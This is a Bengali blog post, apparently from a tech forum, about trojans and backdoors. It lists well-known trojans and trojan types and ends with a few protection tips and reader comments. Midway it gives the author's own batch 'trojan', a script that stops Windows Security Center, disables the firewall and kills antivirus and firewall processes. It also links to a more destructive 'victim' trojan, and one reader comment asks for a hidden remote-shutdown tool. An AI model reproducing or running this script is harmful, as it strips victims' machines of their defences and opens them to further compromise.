ট্রোজান ইঞ্জেক্টিং ও ট্রোজান ব্যাকডোর নিয়ে কিছু কথা …

ট্রোজান আর ব্যাক ডোর হল দুটি পদ্ধতি যার মাধ্যমে একজন হ্যাকার কোন সিস্টেম এ প্রবেশ করতে পারেন ।সাধারনত ব্যাক ডোর বা ট্রোজান একটি সিস্টেম এ অন্য কোন প্রোগ্রাম এর মাধ্যমে প্রবেশ করে ।ইথিকাল হ্যাকার সাধারন ভাবে পরীক্ষা করার জন্য এগুলো ব্যাবহার করে থাকেন । এই দুটি হল ম্যালওয়ার এর একটি রুপ যা অন্য কোন সার্ভার এ অন্য ফাইল এর মাধ্যমে যাবার চেষ্টা করে ।
আর ব্যাক ডোর বলতে বোঝানো হয় একটি পথ তৈরি করা যার মাধ্যমে  ট্রোজান কোন সিস্টেম এ প্রবেশ করে। সাধারনত ট্রোজান কোন অন্য ছবি বা মিউজিক ফাইল এর মাধ্যমে ছড়িয়ে যায় । এতে Steganography পদ্ধতি টি ব্যাবহার করা হয় । এটি সম্পর্কে না যানলে আমি এ নিয়ে লিখেছি । সেটি পড়ে নিবেন ।। সাধারন ভাবে ট্রোজান ছড়ানোর সবথেকে সহজ উপায় হল ব্যাচ ফাইল বা একে .exe তে রুপান্তর করে ইন্সটলার এর মাধ্যমে ছড়িয়ে দেয়া । এতে হ্যাকার রা বিভিন্ন ধরনের GUI ব্যাবহার করেন অন্য দের আকৃষ্ট করার জন্য ।

কয়েকটি কমন ট্রোজান  :

BackOrifice
Deep Throat
NetBus
Whack a mole
Girlfriend
Masters Paradise

এগুলর মধ্যে সবথেকে বিপদজনক হচ্ছে  Girlfriend এবং Netbus । কারন এগুলো ব্যাচ ফাইল এর মাধ্যমে তৈরি করা যায় । এবং কোডের কয়েকটি লাইন পরিবর্তন করে দিলেই দুর্ধর্ষ ভাইরাস  এ পরিনত হয় । আপনি যদি হ্যাকার হতে চান বা সিকিউরিটি নিয়ে কাজ করতে চান আপনাকে অবশ্যই এগুলো নিয়ে কাজ করতে হবে । কিন্তু নিজের কম্পিউটার এ গুলো নিয়ে ঘাটাঘাটি না করে কোন ভার্চুয়াল পরিবেশ তৈরি করাই ভাল । যেমন যারা Comodo  এর ভার্চুয়াল সিকিউরিটি ব্যাবহার করেন তারা যানেন । এই ভাইরাস গুলো নিয়ে কাজ করা কতটা বিপদজনক ।

ট্রোজান এর প্রকারভেদ
বিভিন্ন ধরেনের ট্রোজান আছে । সেগুলর কয়েকটি নিচে তুলে ধরা হল :
Remote Access Trojans : কোন সিস্টেম এ রিমোট অ্যাক্সেস পেতে ব্যাবহার করা হয়

Data Sending Trijans : এটি সাধারনত ডাটা খুঁজে বের করে হ্যাকার এর কাছে তা পাঠিয়ে দেয় ।

Destructive Trojans: এর সাহায্যে কম্পিউটার এর ক্ষতি করা হয় ।

FTP trojans: এটিকে ব্যাবহার করতে হ্যাকার রা port 21 ব্যাবহার করে থাকেন ।

SSDT: এটির পূর্ণরূপ আপনারা কাজ শুনলেই বুঝতে পারবেন । এর মাধ্যমে কোন নির্দিষ্ট বা অনেকগুল antivirus প্রোগ্রাম কে অকেজ   করে দেয়া হয় ।

কয়েকটি ট্রোজান প্রোগ্রাম

Troj_OAJ

এই ট্রোজান টি যে কোন নোটপ্যাড ফাইল কে টারগেট করে । এরপর সেটিকে word ফরমেট পরিবর্তন করে note.com এ নিয়ে যায় । এরপর সেটি windows এর নোটপ্যাড ফোল্ডার এ কপি হয় । এরপর আপনি যতবার নোটপ্যাড খুলবেন ততবার এই ভাইরাস টি আক্টিভ হবে ।
Donald Duck

এটি একটি ব্যাক ডোর ট্রোজান । এটি হ্যাকার কে যেকোনো সিস্টেম এ পুরপরি নিয়ন্ত্রন এনে দেয় । এটার সাথে একটি কি লগার এবং রেজিস্ট্রি এডিট করার প্রগ্রাম থাকে ।এর সাহায্যে সিডি বা ডিভিডি রম খোলা বা বন্ধ করাও সম্ভব হয় । এটি ইঞ্জেক্ট করতে হ্যাকার23476 ও ২৩৪৭৭ ব্যাবহার করে থাকেন

CyberSpy

এটি মূলত একটি স্পাই প্রোগ্রাম । এটি রেজিস্ট্রি তে নিজেকে এন্ট্রি করে নেয়। যার ফলে আন্টিভাইরাস দিয়ে ডিলিট করে দিলেও কম্পিউটার রিবুট করলে আবার এটি আক্টিভ হয়ে যায় ।

Firekill 2000
এই ট্রোজান টি মারাত্তক । এটি সব ধরনের ফায়ারওয়াল , এন্টিভাইরাস কে disable করে দিতে সক্ষম । এমনকি এটি সিকিউরিটি সফটওয়্যার এর নিরাপত্তা  কে ধ্বংস করতে .dll ফাইল কে ডিলিট করে দেয় । তখন সিস্টেম আবার সেটআপ দিতে হয় ।

এছাড়া আর অনেক ট্রোজান প্রোগ্রাম আছে । অনেক ট্রোজান Netcat এর সাহায্যে launch করা হয় । আবার অনেক ট্রোজান সার্ভার রুটিং করে ইঞ্জেক্ট করা হয় ।

একটি ট্রোজান ভাইরাস
এটি আমার নিজের কোড করা একটি ছোট ট্রোজান । এটি এন্টিভাইরাস এর সিকিউরিটি কে রুখে দিতে পারবে ।  এটি মূলত আপনার ওয়িন্দএস এর ফায়ার ওয়াল ও এন্টিভাইরাস এর safe guard কে রুখে দেবে । এটির ইন্টারফেস সবুজ রঙের।  
@ echo off
_Rashed Hasan_

∙ rem –
  colour Db 03
∙ rem Permanently Kill Anti-Virus
∙ net stop “Security Center”
netsh firewall set opmode mode=disable ∙ tskill /A av* ∙
tskill /A fire*
tskill /A [...].
_BCA_
আপনাদেরকে আর ও একটি বিধ্বংসী ট্রোজান এর লিঙ্ক দিতে পারি । কিন্তু সেটি কম্পিউটার এ রান করবেন না । একটি সহজ ট্রিক হচ্ছে কপি পেস্টিং সাইট যেমন http://www.pastebin.com এ যেয়ে পেস্ট করে সেভ করবেন। সেটি যদি কোন ভাইরাস হয় তবে দেখতে পাবেন আপনার এন্টিভাইরাস সিকিউরিটি warning দেবে। আর সেই লিঙ্ক এ প্রবেশ করতে  গেলে আপনার ব্রাউযার থেমে যাবে ।
এই ভাইরাস টি কোন অবস্থাতেই রান করবেন না । এটি ভারতের একজন সিকিউরিটি এক্সপার্ট এর কোড করা
http://www.breakthesecurity.com/2010/12/how-to-disabledelete-your-victims.html


বাঁচার কিছু উপায়
> আপনি যে এন্টিভাইরাস ব্যাবহার করে থাকুন না কেন সেটি আপ টু ডেট থাকতে হবে ।
> সন্দেহ জনক কোন টুল বা লিঙ্ক এ ক্লিক করবেন না ।
> আপনার antivirus এর পাশাপাশি  anti spam ও anti rootkit ব্যাবহার করবেন । আমি বলব অ্যান্টিভাইরাস এর সাথে আপনি kaspersky এর TDS killer টুল টী ব্যাবহার করতে পারেন । এটি পুরো পুরি পোর্টেবল একটি টুল ।

তাহলে আজ এই পর্যন্তই ছিল ।
এরকম অনেক কিছু > http://www.facebook.com/cy133r
আর আমি আছি > http://www.facebook.com/techfreak.unknown
আল্লাহ হাফেয
.............................................................10%3iNfInitY......................................................................

Level 0

আমি রাশেদ রাহুল। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 12 বছর 1 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 53 টি টিউন ও 50 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

ট্রোজান নিয়ে আনেক কিছু জানলাম

ভাই আপনার কাছে internet এর মাধ্যমে remote shutdown করার কোনো software/tool আছে কি? আমি চাচ্ছি বাসার বাইরে গেলেও যেন বাসার পিসি shutdown করতে পারি যাতে আমার ছোট ভাই সারাদিন গেম খেলতে না পারে। Hiddenly remote shutdown হলে আরো ভাল হয়। mail: [email protected]

গুরুত্বপূর্ণ

anek guruttopurno post diyechhen tnkzzzzz chaliye jan

এগুলর মধ্যে সবথেকে বিপদজনক হচ্ছে “Girlfriend” 😛